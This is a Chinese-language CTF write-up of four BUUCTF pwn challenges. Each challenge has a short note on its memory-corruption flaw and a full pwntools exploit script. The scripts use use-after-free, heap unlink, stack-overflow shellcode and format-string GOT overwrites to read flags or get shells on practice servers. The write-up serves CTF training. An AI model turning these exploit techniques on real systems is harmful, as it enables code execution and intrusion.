PWN-PRACTICE-BUUCTF-23

• • gyctf_2020_some_thing_exceting
  • axb_2019_heap
  • [極客大挑戰 2019]Not Bad
  • inndy_echo

gyctf_2020_some_thing_exceting

程序讀取了flag到bss段上的0x6020A8地址處
存在uaf漏洞，利用fastbins的LIFO原則，create大小合適的chunk并free
再次create，將0x6020A8覆寫到之前create并free掉的chunk里，最后show即可打印出flag

# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./gyctf_2020_some_thing_exceting") io=remote("node4.buuoj.cn",29559) elf=ELF("./gyctf_2020_some_thing_exceting") libc=ELF("./libc-2.23.so") flag_addr=0x6020A8def add(ba_len,ba,na_len,na):io.sendlineafter("> Now please tell me what you want to do :","1")io.sendlineafter("> ba's length : ",str(ba_len))io.sendlineafter("> ba : ",ba)io.sendlineafter("> na's length : ",str(na_len))io.sendlineafter("> na : ",na) def edit():io.sendlineafter("> Now please tell me what you want to do :","2") def free(index):io.sendlineafter("> Now please tell me what you want to do :","3")io.sendlineafter("> Banana ID : ",str(index)) def show(index):io.sendlineafter("> Now please tell me what you want to do :","4")io.sendlineafter("> SCP project ID : ",str(index)) def exit():io.sendlineafter("> Now please tell me what you want to do :","5")#gdb.attach(io) #pause()add(0x10,"aaaa",0x20,"bbbb")#0 add(0x20,"cccc",0x20,"dddd")#1#pause()free(1)#pause()free(0)#pause()add(0x10,"eeee",0x10,p64(flag_addr)*2)#2#pause()show(1)exit()io.interactive()

axb_2019_heap

elf，保護全開，不能通過got改寫地址，也不知道程序的基地址
利用格式化字符串漏洞泄露libc基址和main基址
輸入content的get_input函數存在obo漏洞，可構成unlink
參考：buuctf axb_2019_heap

# -*- coding:utf-8 -*- from pwn import * #io=process("./axb_2019_heap") io=remote("node4.buuoj.cn",27073) elf=ELF("./axb_2019_heap") libc=ELF("./libc-2.23-16-x64.so")def add(index,size,content):io.sendlineafter("Enter a option: \n>> ","1")io.sendlineafter("Enter the index you want to create (0-10):",str(index))io.sendlineafter("Enter a size:\n",str(size))io.sendlineafter("Enter the content: \n",content) def free(index):io.sendlineafter("Enter a option: \n>> ","2")io.sendlineafter("Enter an index:\n",str(index)) def show():io.sendlineafter("Enter a option: \n>> ","3") def edit(index,content):io.sendlineafter("Enter a option: \n>> ","4")io.sendlineafter("Enter an index:\n",str(index))io.sendlineafter("Enter the content: \n",content)io.recvuntil("Enter your name: ") payload="%15$p%19$p" io.sendline(payload) io.recvuntil("0x") libc_base=int(io.recvuntil("0x")[:-2],16)-240-libc.sym["__libc_start_main"] main_base=int(io.recvuntil("\n")[:-1],16)-0x000000000000116A print("libc_base=="+hex(libc_base)) print("main_base=="+hex(main_base)) free_hook=libc_base+libc.sym["__free_hook"] system=libc_base+libc.sym["system"] note=main_base+0x202060#gdb.attach(io) #pause()add(0,0x98,"a"*0x98)#0 add(1,0x90,"bbbb")#1 add(2,0x90,"/bin/sh\x00")#2#pause()payload=p64(0)+p64(0x91)+p64(note-0x18)+p64(note-0x10) payload=payload.ljust(0x90,"a") payload+=p64(0x90)+p8(0xa0) edit(0,payload)#pause()free(1)#pause()payload=p64(0)*3+p64(free_hook)+p64(0x08) edit(0,payload)#pause()edit(0,p64(system))#pause()free(2)io.interactive()

[極客大挑戰 2019]Not Bad

NX disabled，堆棧可執行
程序調用mmap函數在地址0x123000處開辟了一塊0x1000大小的堆塊
sub_400A16函數中可造成棧溢出，在棧上布局shellcode，調整棧頂指針rsp，使之能夠指向shellcode
讀取當前目錄下的flag文件到0x123000+0x100處，調用write打印出flag
打開的flag文件的文件描述符按0，1，2的順序加1，即為3

# -*- coding:utf-8 -*- from pwn import * context.arch="amd64" context.os="linux" #io=process("./bad") io=remote("node4.buuoj.cn",27593) elf=ELF("./bad") mmap_addr=0x123000 jmp_rsp=0x400A01 io.recvuntil("Easy shellcode, have fun!\n") payload=asm(shellcraft.read(0,mmap_addr,0x100))+asm("mov rax,0x123000;call rax") payload=payload.ljust(32+8,"\x00") payload+=p64(jmp_rsp)+asm("sub rsp,0x30;jmp rsp") io.sendline(payload) payload=shellcraft.open("./flag") payload+=shellcraft.read(3,mmap_addr+0x100,0x50) payload+=shellcraft.write(1,mmap_addr+0x100,0x50) payload=asm(payload) io.sendline(payload) io.interactive()

inndy_echo

格式化字符串漏洞，輸入的偏移為7
通過printf_got泄露出printf的真實地址，進而得到libc基地址，計算system真實地址
通過printf_got修改printf真實地址為system的真實地址
輸入"/bin/sh\x00"，即可執行system("/bin/sh\x00")

from pwn import * context.log_level='debug' #io=process('./inndy_echo') io=remote("node4.buuoj.cn",28404) elf=ELF('./inndy_echo') printf_got=elf.got["printf"] payload=p32(printf_got)+"%7$s" io.sendline(payload) printf_addr=u32(io.recvuntil('\xf7')[-4:]) print("printf_addr=="+hex(printf_addr)) libc=ELF('./libc-2.23-x32.so') libc_base=printf_addr-libc.sym["printf"] system_addr=libc_base+libc.sym['system'] print("system_addr=="+hex(system_addr)) payload=fmtstr_payload(7,{printf_got:system_addr}) io.sendline(payload) io.sendline('/bin/sh\x00') io.interactive()

總結

以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-23的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。